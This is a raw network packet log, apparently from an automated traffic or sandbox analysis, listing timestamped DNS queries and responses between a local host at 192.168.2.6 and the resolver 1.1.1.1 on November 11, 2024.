                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.372744083 CET53631031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.373025894 CET5088453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.374234915 CET53572461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.374922991 CET53555701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.375605106 CET53646161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.377393007 CET53611501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.380754948 CET5127353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.381036043 CET4964553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.381134033 CET6220153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.381264925 CET5986953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.381477118 CET6523753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.381747007 CET5314953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.381918907 CET5826953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.382102013 CET6426353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.382304907 CET6109953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.383105040 CET53620381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.384108067 CET53637781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.388629913 CET53531491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.390916109 CET53512731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.391107082 CET53652371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.391117096 CET53544211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.391613007 CET6491353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.391796112 CET4994653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.391987085 CET5576653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392107964 CET53496451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392117977 CET53582691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392151117 CET6529753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392851114 CET53610991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392862082 CET53642631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.393465042 CET5262453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.394359112 CET5976853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.394542933 CET5631753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.394542933 CET5106353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.395817995 CET6231253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.396060944 CET6350553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.396348000 CET5313353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.400861979 CET53603671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.401792049 CET53622011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.401968002 CET53499461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.402671099 CET53557661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.403134108 CET53526241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.403167009 CET53639741.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.403513908 CET53508841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.403744936 CET53597681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.407493114 CET53531331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.409426928 CET5747653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.410202980 CET5190353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.410594940 CET5808453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.410768032 CET5325953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.412308931 CET5700053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.412553072 CET53598691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.412559986 CET6379453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.413017988 CET5412853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.413105965 CET5562253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.413279057 CET5330253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.413712978 CET5652053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.415435076 CET53652971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.420938015 CET53580841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.421739101 CET53519031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.423144102 CET53565201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.424077988 CET53533021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.424088001 CET53637941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.425787926 CET53510631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.426613092 CET53563171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.433278084 CET5052453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.433336020 CET6418653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.433917999 CET6167153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.433918953 CET5427553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.433950901 CET53532591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.434117079 CET5610653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.434166908 CET6443953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.434708118 CET6166453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.435158968 CET5799053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.441548109 CET53574761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.442475080 CET53579901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.443753004 CET53542751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.444360018 CET53541281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.444370985 CET53505241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.444434881 CET53616641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.445256948 CET53641861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.451479912 CET53644391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.464906931 CET53616711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.559668064 CET53492361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.605309010 CET53556221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.608741999 CET53570001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.625744104 CET53649131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.678922892 CET5983153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.687304020 CET6548553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.690649986 CET5528453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.691045046 CET5150753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.694417953 CET6326253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.697556973 CET53598311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.699376106 CET53654851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.700654984 CET5700253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.703294039 CET53552841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.703557968 CET53515071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.705518007 CET53632621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.707710028 CET5571153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.708123922 CET4989453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.712287903 CET53570021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.714607000 CET6460453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.714782000 CET6055053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.716830015 CET5950053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.718161106 CET6232853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.718504906 CET5164953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.719069004 CET5109553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.719429016 CET6273453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.719788074 CET6322153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.720439911 CET5625953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.720674038 CET4936253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.721811056 CET53498941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.721852064 CET5041853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.721852064 CET5997953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.721852064 CET6108853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.722505093 CET5451853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.722604036 CET53557111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.723274946 CET6448553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.723417044 CET5662253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.724001884 CET6157853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.724322081 CET5972053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.728008032 CET53605501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.728070021 CET53595001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.729808092 CET53623281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.730717897 CET53510951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.730734110 CET53566221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.731390953 CET53597201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.731894016 CET4966653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.732409000 CET53493621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.732464075 CET53562591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.732677937 CET53545181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.732839108 CET53610881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.732891083 CET53599791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.733707905 CET53504181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.733740091 CET53627341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.734276056 CET53615781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.748461008 CET53646041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.749984980 CET53496661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.751986027 CET53516491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.754589081 CET53644851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.759948015 CET53632211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.776287079 CET5323953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.776494026 CET6261653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.776808023 CET5300253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.777476072 CET5172453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.778069019 CET5491753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.778481007 CET5241753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.784154892 CET5779553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.784334898 CET6094853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.784554958 CET5462153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.785152912 CET6171353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.786359072 CET53626161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.786731958 CET53530021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.787091017 CET53549171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.790055990 CET53532391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.793560028 CET53577951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.795238018 CET53517241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.795624018 CET53617131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.801676035 CET5468153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.807682991 CET5276453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.808665991 CET5245553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.811620951 CET53546811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.815967083 CET53546211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.816245079 CET53609481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.816545963 CET4981453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.816962004 CET4999853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.817842960 CET6070053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.817909956 CET6012653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.821347952 CET5082953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.821791887 CET6485253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.822055101 CET5969353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.822360039 CET5220853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.822751045 CET6545853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.822988033 CET5354753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.823146105 CET5118453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.823164940 CET6337953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.823345900 CET6286453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.823406935 CET6435753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.823664904 CET6433053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.823869944 CET5155453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.824050903 CET5396053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.825711966 CET5737853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.825942039 CET5391853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.826180935 CET5715053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.826210022 CET6185353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.826420069 CET5137253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.826628923 CET53524551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.826719046 CET53498141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.829051018 CET5216953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.830120087 CET5971253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.993537903 CET53628811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.993669033 CET53593141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.994172096 CET5708453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.996511936 CET5011553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.996697903 CET6198653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.996926069 CET5533853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.999247074 CET53593131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.002078056 CET53632061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.004019022 CET53639811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.004405975 CET53570841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.004853010 CET53553381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.005507946 CET53644881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.005548000 CET53501151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.006313086 CET53494401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.006859064 CET53591101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.008867979 CET53498931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.013483047 CET53501911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.013509989 CET53621281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.014525890 CET53592161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.015343904 CET53612061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.021820068 CET53582001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.027652025 CET53619861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.234852076 CET6004353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.235184908 CET5261253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.236793995 CET5088153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.238014936 CET6115353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.239157915 CET5087053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.241957903 CET53600431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.244808912 CET4963253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.245958090 CET53526121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.247828007 CET53611531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.248373032 CET4947253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.248421907 CET53508811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.248509884 CET5330553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.250144005 CET5766753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.253635883 CET6204953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.253842115 CET53496321.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.254096985 CET5606853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.259093046 CET53533051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.260188103 CET53576671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.263886929 CET53620491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.264724970 CET53560681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.266858101 CET5599353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.267354965 CET5958053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.267582893 CET6371053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.267913103 CET5986653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.269764900 CET53508701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.276988983 CET53595801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.277352095 CET53598661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.277581930 CET6232453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.277664900 CET53559931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.278892040 CET53637101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.280472040 CET53494721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.281344891 CET5272653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.284965992 CET5532953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.285099983 CET5352853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.286967993 CET53623241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.288749933 CET5196953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.289174080 CET6094853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.289712906 CET6198553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.290177107 CET53527261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.291265965 CET5787853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.291565895 CET5267653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.295891047 CET5549753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.296145916 CET5305953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.296442032 CET5337853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.296742916 CET53535281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.299664021 CET5115753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.299783945 CET5844553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.299791098 CET53609481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.300204992 CET53619851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.300323963 CET6216153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.300569057 CET5190753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.300992012 CET5596053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.301028013 CET6030453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.304755926 CET6435453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.305149078 CET53533781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.305510998 CET5833353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.306241035 CET5661353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.307378054 CET53584451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.310481071 CET53559601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.310504913 CET6394553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.311197042 CET6262153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.311443090 CET53511571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.311589956 CET6307253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.311762094 CET5396153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.311913967 CET5033953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.312380075 CET53643541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.312455893 CET53603041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.313069105 CET6395753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.314946890 CET53553291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.317311049 CET5766653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.317425013 CET53566131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.318208933 CET6494253192.168.2.61.1.1.1
